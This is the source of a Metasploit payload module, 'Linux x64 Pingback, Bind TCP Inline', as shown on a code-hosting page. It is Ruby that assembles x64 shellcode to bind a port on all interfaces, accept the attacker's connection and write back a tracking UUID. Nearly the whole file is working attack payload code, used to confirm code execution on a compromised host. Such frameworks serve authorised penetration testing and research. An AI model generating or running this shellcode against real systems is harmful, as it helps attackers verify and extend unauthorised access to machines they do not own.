Path: blob/master/modules/payloads/singles/linux/x64/pingback_bind_tcp.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45module MetasploitModule6CachedSize = 10978include Msf::Payload::Linux::X64::Prepends9include Msf::Payload::Single10include Msf::Payload::Pingback11include Msf::Payload::Pingback::Options1213def initialize(info = {})14super(15merge_info(16info,17'Name' => 'Linux x64 Pingback, Bind TCP Inline',18'Description' => 'Accept a connection from attacker and report UUID (Linux x64)',19'Author' => [ 'bwatters-r7' ],20'License' => MSF_LICENSE,21'Platform' => 'linux',22'Arch' => ARCH_X64,23'Handler' => Msf::Handler::BindTcp,24'Session' => Msf::Sessions::Pingback25)26)27end2829def generate(_opts = {})30# 22 -> "0x00,0x16"31# 4444 -> "0x11,0x5c"32encoded_port = [datastore['LPORT'].to_i, 2].pack('vn').unpack('N').first33encoded_host = Rex::Socket.addr_aton('0.0.0.0').unpack('V').first34encoded_host_port = format('0x%<encoded_host>.8x%<encoded_port>.8x', { encoded_host: encoded_host, encoded_port: encoded_port })35self.pingback_uuid ||= generate_pingback_uuid36uuid_as_db = '0x' + pingback_uuid.chars.each_slice(2).map(&:join).join(',0x')3738asm = %^39push rsi40push rax41;SOCKET42push 0x2943pop rax44cdq45push 0x246pop rdi47push 0x148pop rsi49syscall ; socket(PF_INET, SOCK_STREAM, IPPROTO_IP)50test rax, rax51js failed5253xchg rdi, rax54mov rcx, #{encoded_host_port}55push rcx56mov rsi, rsp57push rsp58pop rsi ; store pointer to struct5960bind_call:61; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen)62; rdi -> fd already stored in rdi63; rsi -> pointer to sockaddr_in6 struct already in rsi64push 0x3165pop rax ; bind syscall66push 0x10 ; sockaddr length67pop rdx ;68syscall6970listen_call:71; int listen(int sockfd, int backlog);72; rdi -> fd already stored in rdi73push 0x3274pop rax ; listen syscall75push 0x176pop rsi ; backlog77syscall7879accept_call:80; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);81; rdi -> fd already stored in rdi82push 0x2b83pop rax ; accept syscall84cdq ; zero-out rdx via sign-extension85push rdx86push rdx87push rsp88pop rsi ; when populated, client will be stored in rsi89push 0x1c90lea rdx, [rsp] ; pointer to length of rsi (16)91syscall92xchg rdi, rax ; grab client fd93send_pingback:94; sys_write(fd:rdi, buf*:rsi, length:rdx)95push #{uuid_as_db.split(',').length} ; length of the PINGBACK UUID96pop rdx ; length in rdx97call get_uuid_address ; put uuid buffer on the stack98db #{uuid_as_db} ; PINGBACK_UUID99get_uuid_address:100pop rsi ; UUID address into rsi101xor rax, rax ; sys_write = offset 1102inc rax ; sys_write = offset 1103syscall ; call sys_write104105failed:106push 0x3c107pop rax108push 0x1109pop rdi110syscall ; exit(1)111^112Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string113end114end115116117